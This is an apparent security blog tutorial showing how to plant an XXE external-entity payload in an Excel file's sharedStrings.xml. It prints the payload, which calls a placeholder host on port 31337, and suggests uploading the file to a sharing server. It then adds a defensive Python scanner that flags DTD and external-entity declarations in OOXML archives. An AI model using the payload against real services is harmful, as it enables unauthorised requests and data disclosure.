Exploit XXE Vulnerability Using Excel File

In my last article we exploited XXE using a DOCX file. Now let's build an XXE exploit using an Excel file.

Exploit XXE Vulnerability Using Excel File?

Microsoft released OOXML Document, OOXML Presentation and OOXML Workbook on 7 December 2006. Source: Wikipedia.

So, what is Office Open XML?

Office Open XML, also known as OpenXML or OOXML, is an XML-based format for office documents, including word processing documents, spreadsheets, presentations, as well as charts, diagrams, shapes, and other graphical material. The specification was developed by Microsoft and adopted by ECMA International as ECMA-376 in 2006. A second version was released in December, 2008, and a third version of the standard released in June, 2011. The specification has been adopted by ISO and IEC as ISO/IEC 29500. Source: officeopenxml.com

Enough of the intro.

First, create an Excel file (just like before, I am using LibreOffice), save it with the xlsx extension and extract the xlsx file (it is a zip archive).

Here are the contents of the extracted archive (screenshot omitted); the part we care about is sharedStrings.xml.

All we have to do is put our exploit into the file sharedStrings.xml.

Here is the exploit I used.

<!DOCTYPE pv8 [
 <!ELEMENT pv8 ANY >
 <!ENTITY pv8xxe SYSTEM "http://xxx.xxx.xxx.xxx:31337/">]>
<pv8>&pv8xxe;</pv8>

You can then upload the modified file to a file sharing server to test for the vulnerability. 🙂
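From the defender's side, a check for exactly this kind of document, as an added example that is not part of the original post: it unpacks an OOXML archive and uses expat's declaration callbacks to report any XML part carrying a DOCTYPE or an external entity, which legitimate OOXML parts do not need. The workbook parts below are constructed for the demo, and the host is the placeholder from the post.

```python
import io
import zipfile
import xml.parsers.expat

# Constructed sample parts, not taken from a real workbook; the host is the
# placeholder used in the post above.
CONTENT_TYPES = b'<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>'
BENIGN_SST = (b'<?xml version="1.0"?><sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
              b'<si><t>hello</t></si></sst>')
XXE_SST = (b'<?xml version="1.0"?><!DOCTYPE pv8 [ <!ELEMENT pv8 ANY >'
           b' <!ENTITY pv8xxe SYSTEM "http://xxx.xxx.xxx.xxx:31337/">]>'
           b'<pv8>&pv8xxe;</pv8>')

def build_workbook(shared_strings: bytes) -> bytes:
    """Assemble a minimal xlsx-shaped zip around the given sharedStrings part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("xl/sharedStrings.xml", shared_strings)
    return buf.getvalue()

def declarations_in_part(data: bytes) -> list[str]:
    """Report DOCTYPE and external-entity declarations found in one XML part."""
    findings: list[str] = []
    parser = xml.parsers.expat.ParserCreate()
    # Never expand parameter entities or fetch an external subset while scanning.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = lambda name, sysid, pubid, internal: findings.append(f"DOCTYPE {name}")
    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None:  # SYSTEM/PUBLIC entity pointing outside the document
            findings.append(f"external entity {name} -> {sysid}")
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)  # no ExternalEntityRefHandler is set, so nothing is fetched
    except xml.parsers.expat.ExpatError:
        pass  # a malformed part still reports whatever declarations were seen
    return findings

def scan_ooxml(archive: bytes) -> dict[str, list[str]]:
    """Map each XML part of an OOXML zip that declares a DTD or external entity to its findings."""
    report: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name in zf.namelist():
            if name.lower().endswith((".xml", ".rels")):
                found = declarations_in_part(zf.read(name))
                if found:
                    report[name] = found
    return report
```

Run `scan_ooxml(build_workbook(XXE_SST))` to see the sharedStrings part flagged with its DOCTYPE and the external entity target, while the benign workbook yields an empty report.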
